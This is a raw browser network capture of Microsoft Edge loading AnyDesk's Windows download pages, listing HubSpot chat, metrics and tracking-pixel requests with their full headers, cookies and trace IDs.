GET /api/livechat-public/v1/bots/public/bot/2029034/welcomeMessages?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626&conversations-visitor-ui=static-1.20626&traceId=c08b002be84840e4bf63c5e98ea0ad79&sessionId=AMOaWbJF-0X466NZJUYCUmi7wqCtj8AxLECR1JWKS-NiJL6usKc5tKtppTGrRpRQlo1ZPdlaG7j-0PZ-Fj4Mse_sWjAURfyPaVENfaYw0WL1dguK1Zq1UobyhA8vyPDKREjsissVUDU2e8XjXeYjLaNdCE9kE6_i1IkiwW9Qb1wZFxDXFnwDM24&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f HTTP/2.0
host: app.hubspot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: application/json, text/javascript, */*; q=0.01
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/conversations-visitor/7940397/threads/utk/c08b002be84840e4bf63c5e98ea0ad79?uuid=905453b86c4542a58acfea7db80e8d30&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&domain=anydesk.com&inApp53=false&messagesUtk=c08b002be84840e4bf63c5e98ea0ad79&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:19 GMT
content-type: application/json;charset=utf-8
content-length: 528
cf-ray: 8cdeab7058ed0bad-AMS
cf-cache-status: DYNAMIC
content-encoding: gzip
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: false
access-control-allow-headers: Accept, Accept-Charset, Accept-Encoding, Accept-Language, Content-Type, Host, Origin, Referer, User-Agent, X-HubSpot-Messages-Uri
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
server-timing: hcid;desc=12a1e614-90b1-49c5-8a0e-673168b5fe31
x-content-type-options: nosniff
x-hubspot-correlation-id: 12a1e614-90b1-49c5-8a0e-673168b5fe31
set-cookie: __cf_bm=uItig.ZNdbT7TSd2.FJE1BOMZeBD3wx4N1z6kwgpxg8-1728144499-1.0.1.1-Ih9_WY3kG2dcRw.UEcaQSp.Qry0K.RBvHuQg1ZnI8ozSAHPjue9hTDSmGvEQCmbvxBSk3wiWcH0Zb5jsVCaG7g; path=/; expires=Sat, 05-Oct-24 16:38:19 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BPpCkA3D8863PNpxAfPS4LxK4JtqX6fw8SZr1wRGc5ka%2FzTnnPnJlrBb90s095S%2BJeaVe%2BzVp8wrTSjrADhKV0Q3rwqFWyuMJtMq6shIALOjK%2BpHTVJgLtpWTbX1cym7sQ%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=CoOm.kcQ.hu_Ytm6yV60SGei0pSDNFQ2evs_djZgUrk-1728144499415-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
POST

https://app.hubspot.com/api/cartographer/v1/ipl

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /api/cartographer/v1/ipl HTTP/2.0
host: app.hubspot.com
content-length: 3087
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/conversations-visitor/7940397/threads/utk/c08b002be84840e4bf63c5e98ea0ad79?uuid=905453b86c4542a58acfea7db80e8d30&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&domain=anydesk.com&inApp53=false&messagesUtk=c08b002be84840e4bf63c5e98ea0ad79&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

date: Sat, 05 Oct 2024 16:08:23 GMT
cf-ray: 8cdeab8c6eb10bad-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://app.hubspot.com
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: true
access-control-allow-headers: Authorization, authorization, Origin, origin, X-Requested-With, x-requested-with, Content-Type, content-type, Accept, accept, Accept-Charset, accept-charset, Accept-Encoding, accept-encoding, X-Override-Internal-Permissions, x-override-internal-permissions, X-Properties-Source, x-properties-source, X-Properties-SourceId, x-properties-sourceid, X-Properties-Flag, x-properties-flag, X-Hubspot-User-Id, x-hubspot-user-id, X-Hubspot-Trace, x-hubspot-trace, X-Hubspot-Callee, x-hubspot-callee, X-Hubspot-Offset, x-hubspot-offset, X-Hubspot-No-Trace, x-hubspot-no-trace, X-HubSpot-Static-App-Info, x-hubspot-static-app-info, X-HubSpot-Messages-Uri, x-hubspot-messages-uri, X-HubSpot-Request-Source, x-hubspot-request-source, X-HubSpot-Request-Reason, x-hubspot-request-reason, Subscription-Billing-Auth-Token, subscription-billing-auth-token, X-App-CSRF, x-app-csrf, X-Tools-CSRF, x-tools-csrf, Online-Payment-Signing-UUID, online-payment-signing-uuid, X-Source, x-source, X-SourceId, x-sourceid, X-Origin-UserId, x-origin-userid, X-Biden-Request-Source, x-biden-request-source, X-HubSpot-CSRF-hubspotapi, x-hubspot-csrf-hubspotapi, X-Force-Cookie-Refresh, x-force-cookie-refresh, X-Force-Cookie-Refresh-No-Cache, x-force-cookie-refresh-no-cache, X-HS-User-Request, x-hs-user-request, X-Application-Id, x-application-id, X-HS-Referer, x-hs-referer, X-HubSpot-Dpl-Correlation-Group-Id, x-hubspot-dpl-correlation-group-id, X-HubSpot-Dpl-Parent-Log-Id, x-hubspot-dpl-parent-log-id, X-HS-InfraIdp-Engaged, x-hs-infraidp-engaged, traceparent, X-HsOpenTelemetry-Head-Sampling-Strategy, x-hsopentelemetry-head-sampling-strategy, x-hs-fingerprint
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, x-hubspot-notfound, X-HS-User-Request, x-hs-user-request, Link, link, Server-Timing, server-timing, X-Hubspot-Correct-Hublet, x-hubspot-correct-hublet, X-HubSpot-Auth-Failure, x-hubspot-auth-failure
access-control-max-age: 604800
server-timing: hcid;desc=300c212e-a90f-41c9-b020-bff48c2009d3
timing-allow-origin: *
x-content-type-options: nosniff
x-hubspot-correlation-id: 300c212e-a90f-41c9-b020-bff48c2009d3
set-cookie: __cf_bm=gK5JZCgm_a0XqqfF9rSlkzEX3doDeKgXBA5mLMCQ6Tg-1728144503-1.0.1.1-J4ANvK92jOkGNkV9v4wzHjkyv1z3NoHsXC0h7DbrPzfuvzW4Rwo_Ompagng8g4PgmtFZd7pzNUTmyztJtvLkbg; path=/; expires=Sat, 05-Oct-24 16:38:23 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UxQFCjXXkqpkm2DahY2OfCopz0uupis6Rh42%2FoRmtdCcUQ%2B1Usm3I591%2BAmCIo%2FZPy7ixN7aVGStzCVpTjcBaK9ssrpAG0y2t5%2FykAlpWgIntnsGnJs98FyUFZZtgTCJkA%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=2MIkli.zHHwdGz5mlGNxL5F48cG2Ji_gCGBji4GuFc8-1728144503926-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
POST

https://metrics-fe-na1.hubspot.com/metrics/v1/frontend/custom/send?hs_static_app=conversations-visitor-ui&hs_static_app_version=static-1.20626

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /metrics/v1/frontend/custom/send?hs_static_app=conversations-visitor-ui&hs_static_app_version=static-1.20626 HTTP/2.0
host: metrics-fe-na1.hubspot.com
content-length: 2142
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

date: Sat, 05 Oct 2024 16:08:27 GMT
access-control-allow-origin: https://app.hubspot.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-allow-headers: Origin, origin, X-Requested-With, x-requested-with, Content-Type, content-type, Accept, accept, Accept-Charset, accept-charset, Accept-Encoding, accept-encoding, X-Override-Internal-Permissions, x-override-internal-permissions, X-Properties-Source, x-properties-source, X-Properties-SourceId, x-properties-sourceid, X-Properties-Flag, x-properties-flag, X-Hubspot-User-Id, x-hubspot-user-id, X-Hubspot-Trace, x-hubspot-trace, X-Hubspot-Callee, x-hubspot-callee, X-Hubspot-Offset, x-hubspot-offset, X-Hubspot-No-Trace, x-hubspot-no-trace, X-HubSpot-Static-App-Info, x-hubspot-static-app-info, X-HubSpot-Messages-Uri, x-hubspot-messages-uri, X-HubSpot-Request-Source, x-hubspot-request-source, X-HubSpot-Request-Reason, x-hubspot-request-reason, Subscription-Billing-Auth-Token, subscription-billing-auth-token, X-App-CSRF, x-app-csrf, X-Tools-CSRF, x-tools-csrf, Online-Payment-Signing-UUID, online-payment-signing-uuid, X-Source, x-source, X-SourceId, x-sourceid, X-Origin-UserId, x-origin-userid, X-Biden-Request-Source, x-biden-request-source, X-HubSpot-CSRF-hubspotapi, x-hubspot-csrf-hubspotapi, X-Force-Cookie-Refresh, x-force-cookie-refresh, X-Force-Cookie-Refresh-No-Cache, x-force-cookie-refresh-no-cache, X-HS-User-Request, x-hs-user-request, X-Application-Id, x-application-id, X-HS-Referer, x-hs-referer, X-HubSpot-Dpl-Correlation-Group-Id, x-hubspot-dpl-correlation-group-id, X-HubSpot-Dpl-Parent-Log-Id, x-hubspot-dpl-parent-log-id, X-HS-InfraIdp-Engaged, x-hs-infraidp-engaged, traceparent, X-HsOpenTelemetry-Head-Sampling-Strategy, x-hsopentelemetry-head-sampling-strategy, x-hs-fingerprint
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, x-hubspot-notfound, X-HS-User-Request, x-hs-user-request, Link, link, Server-Timing, server-timing, X-Hubspot-Correct-Hublet, x-hubspot-correct-hublet, X-HubSpot-Auth-Failure, x-hubspot-auth-failure
access-control-allow-credentials: true
access-control-max-age: 604800
timing-allow-origin: *
vary: origin
x-content-type-options: nosniff
x-envoy-upstream-service-time: 12
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: 863b8402-476e-4b2d-b106-b23d85f41835
x-evy-trace-served-by-pod: iad02/metrics-fe-td/envoy-proxy-5464c9d5f5-d9tfd
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: 863b8402-476e-4b2d-b106-b23d85f41835
cf-cache-status: DYNAMIC
set-cookie: __cf_bm=heFDHhrMpGFyFb7smcFW7bFByP.My9h9AcNuHkgKkR4-1728144507-1.0.1.1-kjEiIdtxRHaWZ_K4AEbw5iapQL1piZ0QU2k2.IaPS9j7HjTinr5lr3u8AV3yPcli0CQouCK3e0bJzym8eF44Uw; path=/; expires=Sat, 05-Oct-24 16:38:27 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tYX4GYH6IE77NMoBiHVFxioH%2Bg0o3fjn4f9FpXfNzZPlhQyyndCzcsH5csO0hzw%2BBgfh6Hv2i%2BoUyw7Y06TBXd%2F5ycWywaYdLx6225o270Lw%2B5rjV%2FhoHl7GCyj9V%2BElbnY9b0WKqJObMLyM"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
set-cookie: _cfuvid=TL2fCgvO2O6cs_0EeW1IwNlj7_AmapyvqWCig1txh5U-1728144507811-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
cf-ray: 8cdeaba4fe460bad-AMS
POST

https://metrics-fe-na1.hubspot.com/metrics/v1/frontend/send

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /metrics/v1/frontend/send HTTP/2.0
host: metrics-fe-na1.hubspot.com
content-length: 588
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

date: Sat, 05 Oct 2024 16:08:27 GMT
access-control-allow-origin: https://app.hubspot.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-allow-headers: Origin, origin, X-Requested-With, x-requested-with, Content-Type, content-type, Accept, accept, Accept-Charset, accept-charset, Accept-Encoding, accept-encoding, X-Override-Internal-Permissions, x-override-internal-permissions, X-Properties-Source, x-properties-source, X-Properties-SourceId, x-properties-sourceid, X-Properties-Flag, x-properties-flag, X-Hubspot-User-Id, x-hubspot-user-id, X-Hubspot-Trace, x-hubspot-trace, X-Hubspot-Callee, x-hubspot-callee, X-Hubspot-Offset, x-hubspot-offset, X-Hubspot-No-Trace, x-hubspot-no-trace, X-HubSpot-Static-App-Info, x-hubspot-static-app-info, X-HubSpot-Messages-Uri, x-hubspot-messages-uri, X-HubSpot-Request-Source, x-hubspot-request-source, X-HubSpot-Request-Reason, x-hubspot-request-reason, Subscription-Billing-Auth-Token, subscription-billing-auth-token, X-App-CSRF, x-app-csrf, X-Tools-CSRF, x-tools-csrf, Online-Payment-Signing-UUID, online-payment-signing-uuid, X-Source, x-source, X-SourceId, x-sourceid, X-Origin-UserId, x-origin-userid, X-Biden-Request-Source, x-biden-request-source, X-HubSpot-CSRF-hubspotapi, x-hubspot-csrf-hubspotapi, X-Force-Cookie-Refresh, x-force-cookie-refresh, X-Force-Cookie-Refresh-No-Cache, x-force-cookie-refresh-no-cache, X-HS-User-Request, x-hs-user-request, X-Application-Id, x-application-id, X-HS-Referer, x-hs-referer, X-HubSpot-Dpl-Correlation-Group-Id, x-hubspot-dpl-correlation-group-id, X-HubSpot-Dpl-Parent-Log-Id, x-hubspot-dpl-parent-log-id, X-HS-InfraIdp-Engaged, x-hs-infraidp-engaged, traceparent, X-HsOpenTelemetry-Head-Sampling-Strategy, x-hsopentelemetry-head-sampling-strategy, x-hs-fingerprint
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, x-hubspot-notfound, X-HS-User-Request, x-hs-user-request, Link, link, Server-Timing, server-timing, X-Hubspot-Correct-Hublet, x-hubspot-correct-hublet, X-HubSpot-Auth-Failure, x-hubspot-auth-failure
access-control-allow-credentials: true
access-control-max-age: 604800
timing-allow-origin: *
vary: origin
x-content-type-options: nosniff
x-envoy-upstream-service-time: 25
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: 95e96c59-3d3c-41b3-b3bc-019ad4c7f1c7
x-evy-trace-served-by-pod: iad02/metrics-fe-td/envoy-proxy-5464c9d5f5-4kmpb
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: 95e96c59-3d3c-41b3-b3bc-019ad4c7f1c7
cf-cache-status: DYNAMIC
set-cookie: __cf_bm=aPVIpjjEBGL4vnBD.SFObt0XKrc5fnCjy3oA_CLAd_M-1728144507-1.0.1.1-YXAETzbx.4P34A1kB4U3i8MgzZpaAoj7oJUuwZefbs.DGSb6QwnbMgIntxh2N_zWC4WtZ8nCU1yVJjPzTi3brw; path=/; expires=Sat, 05-Oct-24 16:38:27 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a4CHLQh%2FcXxPlMTk1LfHCRga%2F6StifT1PE3xsCr0v%2BK3Q%2FCGMM9FqvyTt2yB9lCPazxr%2FyDM0m2%2B3JTZvHigcESe64%2FuZ4KLub6g7CBkVd0hn3EE4SDx9qxdhyVuAAUa1IH8NtfFbLaG%2FHuF"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
set-cookie: _cfuvid=m6jByLBtQQQOHkG3u2NPfAw8CE6Jy2nyPWb2wQpX7K8-1728144507820-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
cf-ray: 8cdeaba4ee280bad-AMS
GET

https://cta-service-cms2.hubspot.com/web-interactives/public/v1/embed/combinedConfigs?portalId=7940397&currentUrl=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&utk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.3.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows

msedge.exe

Remote address:

104.16.117.116:443

Request

GET /web-interactives/public/v1/embed/combinedConfigs?portalId=7940397&currentUrl=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&utk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.3.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows HTTP/2.0
host: cta-service-cms2.hubspot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://anydesk.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:28 GMT
content-type: application/json;charset=utf-8
vary: origin
access-control-allow-headers: Accept, Accept-Charset, Accept-Encoding, Accept-Language, Content-Type, Host, Origin, Referer, User-Agent
access-control-allow-credentials: true
x-content-type-options: nosniff
access-control-allow-origin: https://anydesk.com
access-control-allow-methods: OPTIONS, GET
access-control-max-age: 180
cache-control: max-age=0, no-cache, no-store
x-robots-tag: noindex, follow
x-envoy-upstream-service-time: 9
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: 4cf068d2-40a4-472b-bd9b-1022c59f8588
x-evy-trace-served-by-pod: iad02/star-hubspot-td/envoy-proxy-5485db5487-jqzfq
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: 4cf068d2-40a4-472b-bd9b-1022c59f8588
cf-cache-status: DYNAMIC
set-cookie: __cf_bm=OAViC3yMQtu0KHUk8Tn9C7T0RaU3d0NgehOHQmvlDHY-1728144508-1.0.1.1-pnf1cfslnlkM32pJ1dyL2Bj2FgoUVKxGjqRuIW9XwPU3MC_sD6.MVNnVUNpv0ZE.ZredNO5xkJcTbZ0HUcuEDg; path=/; expires=Sat, 05-Oct-24 16:38:28 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5n4dpcM02eE%2BzZD7MQmAcYCA6RKhhMQF%2BTfC8vBRz%2B93RPeIJ6YPG1L0EPCHO6mRAsnJ8FOqN7a68Ac7NjZDtPAUTlCNDO5gZtMtAaun6ipNiNdJIz7RmF%2FLDcdIpInohgtDz%2BeRy4GOCM7IzUI%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
set-cookie: _cfuvid=1yFzk2DHBZ4xywEG4o0i.mq4hWEGwGM02ESo9QEP9Jc-1728144508868-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
cf-ray: 8cdeababbf380bad-AMS
content-encoding: br
OPTIONS

https://api.hubspot.com/livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=3b5dfcf8035541a9b4520f1e214bc1fb&traceId=3b5dfcf8035541a9b4520f1e214bc1fb&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.3.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows

msedge.exe

Remote address:

104.16.117.116:443

Request

OPTIONS /livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=3b5dfcf8035541a9b4520f1e214bc1fb&traceId=3b5dfcf8035541a9b4520f1e214bc1fb&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.3.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows HTTP/2.0
host: api.hubspot.com
accept: */*
access-control-request-method: GET
access-control-request-headers: x-hubspot-messages-uri
origin: https://anydesk.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: cross-site
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:28 GMT
content-type: text/plain; charset=utf-8
content-length: 18
cf-ray: 8cdeababbf3b0bad-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://anydesk.com
allow: HEAD,GET,OPTIONS
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: false
access-control-allow-headers: Accept, Accept-Charset, Accept-Encoding, Accept-Language, Content-Type, Host, Origin, Referer, User-Agent, X-HubSpot-Messages-Uri
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
x-content-type-options: nosniff
x-hubspot-correlation-id: 0da693bf-98ce-4a59-b225-dc94da6e0688
set-cookie: __cf_bm=KoljoenEvI5MABrGOGV54_0A6Le2RnWOn2XswoXb0V0-1728144508-1.0.1.1-d4N02_5ZwuNBNHP6QjrecRqUogl0cO3WkM6GQdSJx_DIbHiRkpXKuRu5S_iAe7wRVUndCj8rbeNNYv.YYALT1Q; path=/; expires=Sat, 05-Oct-24 16:38:28 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f06x6x8hu6WjwpABWP0Dk%2BDcY8OJHK%2FVOqS5KoqAw58w5Fn52oANYQN%2BkBtgNuup1FilZUTubiaDl1GuluTGqk0lwNEG%2BTpm8s0GQx99Z1ZZpNKjBvLXn44pykQog3xw2Q%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=32i.lJtyuO6ocbKtspLzqxoF0KaIsZLqDBERvXDMcpk-1728144508888-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
GET

https://track.hubspot.com/__ptq.gif?k=1&sd=1280x720&cd=24-bit&cs=UTF-8&ln=en-us&bfp=1331607227&v=1.1&a=7940397&rcu=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you&r=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&pu=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&t=Thank+you+for+downloading+AnyDesk&cts=1728144507850&vi=a5b3d1933284be27e3a7527fad5a6a3f&nc=false&u=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&b=261462610.3.1728144483689&ce=false&cc=0

msedge.exe

Remote address:

104.16.117.116:443

Request

GET /__ptq.gif?k=1&sd=1280x720&cd=24-bit&cs=UTF-8&ln=en-us&bfp=1331607227&v=1.1&a=7940397&rcu=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you&r=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&pu=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&t=Thank+you+for+downloading+AnyDesk&cts=1728144507850&vi=a5b3d1933284be27e3a7527fad5a6a3f&nc=false&u=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&b=261462610.3.1728144483689&ce=false&cc=0 HTTP/2.0
host: track.hubspot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:28 GMT
content-type: image/gif
content-length: 45
cf-ray: 8cdeabac6ffd0bad-AMS
cf-cache-status: DYNAMIC
cache-control: no-cache, no-store, no-transform
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: false
p3p: CP="NOI CUR ADM OUR NOR STA NID"
x-content-type-options: nosniff
x-envoy-upstream-service-time: 5
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-served-by-pod: iad02/analytics-tracking-td/envoy-proxy-689db97f95-229qm
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: 574ad0a8-fda1-47dc-8823-9d7c18bce3f2
x-request-id: 574ad0a8-fda1-47dc-8823-9d7c18bce3f2
x-robots-tag: none
set-cookie: __cf_bm=k1NeAnjdQwVdUh7gxv1u7VWJXUDsqV0Wp5syTAVhkfE-1728144508-1.0.1.1-b8PktJJ2RNMlrRoGPQTtXZ5F0APCjzjYjehihp1A9L29FIMB1WgcjHMauttBKv1H4lYH.9h9SfcYzMGEHW52jA; path=/; expires=Sat, 05-Oct-24 16:38:28 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
